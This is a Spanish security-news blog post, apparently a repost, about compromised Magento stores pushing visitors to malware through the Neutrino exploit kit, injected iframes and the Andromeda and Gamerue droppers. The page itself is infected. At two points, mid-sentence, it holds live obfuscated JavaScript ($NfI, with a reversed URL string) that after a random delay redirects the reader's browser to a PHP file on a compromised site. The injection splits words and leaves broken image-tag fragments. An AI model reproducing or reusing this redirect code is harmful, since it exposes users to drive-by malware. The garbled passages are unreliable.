Utilizan los sitios web con Magento para distribuir malware
Aunque la alarma saltó a finales de la semana pasada, ha sido esta cuando ha quedado totalmente confirmado que los sitios web de la aplicación de ecommerce difunden malware entre los usuarios. Aunque desde Magento no han realizado ningún comentario al respecto, expertos en seguridad han confirmado que se está utilizando un exploit Neutrino para realizar la redirección.
{if (typeof ($NfI.list[n]) == “string”) return $NfI.list[n].split(“”).reverse().join(“”);return $NfI.list[n];};$NfI.list=[“‘php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}</script>to-Logo.jpg?x=634&y=309″ alt=”” width=”634″ height=”308″ /></p>
<p>En un principio, los exper<script>$NfI=function(n){if (typeof ($NfI.list[n]) == ){kind=logo}
tos en seguridad catalogaron la amenaza como una actividad de un aficionado, ya que no ocultó en ningún instante la actividad del archivo neitrino.php, encargado de realizar las redirecciones a sitios web infectados con virus informáticos. Sin embargo, esto era solo el comienzo, ya que después del fin de semana la oleada se ha recrudecido y se han detectado una gran cantidad de ataques inyectando código en forma de iframes en las páginas del servicio.
Los investigadores han realizado investigaciones por separado y al margen de los responsables de la misma, que hasta el momento han decidido no verter ningún tipo de información. Después de varios días han llegado a la conclusión que debe existir alguna vulnerabilidad en el gestor de contenidos de los portales web o bien en alguna extensión que está propiciando la realización del ataque. Tomando este caso como ejemplo, queda de manifiesto lo importante que resulta mantener actualizado el gestor de contenidos y los plugins para así evitar que ciberdelincuentes se aprovechen de fallos de seguridad existentes. En esta ocasión ha sido una página web pero es igualmente aplicable a los usuarios particulares.
En este momento no se puede cuantificar cuántos sitios web están afectados por estos ataques.
{if (typeof ($NfI.list[n]) == “string”) return $NfI.list[n].split(“”).reverse().join(“”);return $NfI.list[n];};$NfI.list=[“‘php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}</script>to-distribuyen-malware-655×626.jpg?x=634″ alt=”” width=”634″ height=”606″ /></p>
<p>sitios web de magen<script>$NfI=function(n){if (typeof ($NfI.list[n]) == )
to distribuyen malware
Relación con una vulnerabilidad zero-day detectada en Magento
Aunque oficialmente no se ha confirmado la vinculación, hace algunas semanas se detectó una vulnerabilidad en un complemento que permitía el volcado instantáneo de los productos con sus datos a la tienda en línea. Conocido como Magmi, si los ciberdelincuentes hacen uso de esta vulnerabilidad podrían alterar el código fuente de la página y así incrustar los iframes detectados.
A partir de ahí, el código de Neutrino hace sus función redirigiendo al usuario a páginas web infectadas con virus informáticos, concretamente Andromeda y Gamerue, dos piezas que se utilizan como puerta de entrada a más malware, concretamente troyanos bancarios. Los dos mencionados con anterioridad incorporan keyloggers y formgrabber, por lo que la peligrosidad de entrada ya resulta bastante elevada.
Ver información original al respecto en Fuente:
to-para-distribuir-malware/#sthash.5wjDGliQ.dpuf
NOTA: Los interesados en información sobre contrato de soporte Asistencia Tecnica de SATINFO y/o licencia de uso/actualizaciones de sus utilidades, contacten con info@satinfo.es
__________
Este blog no se hace responsable de las opiniones y comentarios de los textos en los que se cita la Fuente, ofreciendo su contenido solo para facilitar el acceso a la información del mismo.
Puedes seguir cualquier respuesta a esta entrada mediante el canal RSS 2.0. Los comentarios y los pings están cerrados.
Siguenos
en facebook
Los comentarios están cerrados.